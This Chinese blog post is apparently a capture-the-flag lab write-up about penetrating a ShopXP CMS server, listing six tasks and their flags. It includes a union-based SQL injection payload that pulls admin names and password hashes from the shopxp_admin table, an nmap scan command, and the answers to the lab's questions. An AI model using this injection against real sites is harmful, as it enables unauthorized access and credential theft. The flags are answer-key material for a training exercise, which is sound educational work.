B-1:CMS网站渗透

该文章详细描述了针对B-1CMS服务器的一系列渗透测试步骤,包括发现网站运行在8089端口,网站名为SHOPXP.cn,存在名为/pinglun.asp的SQL注入漏洞,数据库表名为shopxp_admin,管理员加密密码为7a57a5a743894a0e,以及服务器本地名称为workgrou-sypyia。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

B-1:CMS网站渗透
任务环境说明:
	服务器场景:Server2206(关闭链接)
	服务器场景操作系统:未知
1.使用渗透机对服务器信息收集,并将服务器中网站服务端口号作为flag提交;
2.使用渗透机对服务器信息收集,将网站的名称作为flag提交;
3.使用渗透机对服务器渗透,将可渗透页面的名称作为flag提交; 
4.使用渗透机对服务器渗透,并将网站中所用的数据库的表名作为flag提交;
5.使用渗透机对服务器渗透,将网站管理员的加密密码作为flag提交;
6.使用渗透机对服务器渗透,将服务器的本地名称作为flag提交。

1.使用渗透机对服务器信息收集,并将服务器中网站服务端口号作为flag提交;


flag{8089}

2.使用渗透机对服务器信息收集,将网站的名称作为flag提交;


flag{SHOPXP.cn}

3.使用渗透机对服务器渗透,将可渗透页面的名称作为flag提交;


https://blog.csdn.net/u013102998/article/details/17373329
sql注入漏洞存在于/admin/pinglun.asp文件


flag{pinglun.asp}

4.使用渗透机对服务器渗透,并将网站中所用的数据库的表名作为flag提交;

?id=1 union select 1,2,admin,4,5,password,7,8,9,10,11 from shopxp_admin


flag{shopxp_admin}

5.使用渗透机对服务器渗透,将网站管理员的加密密码作为flag提交;


flag{7a57a5a743894a0e}

6.使用渗透机对服务器渗透,将服务器的本地名称作为flag提交。

nmap -O -A  192.168.14.131


flag{workgrou-sypyia}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值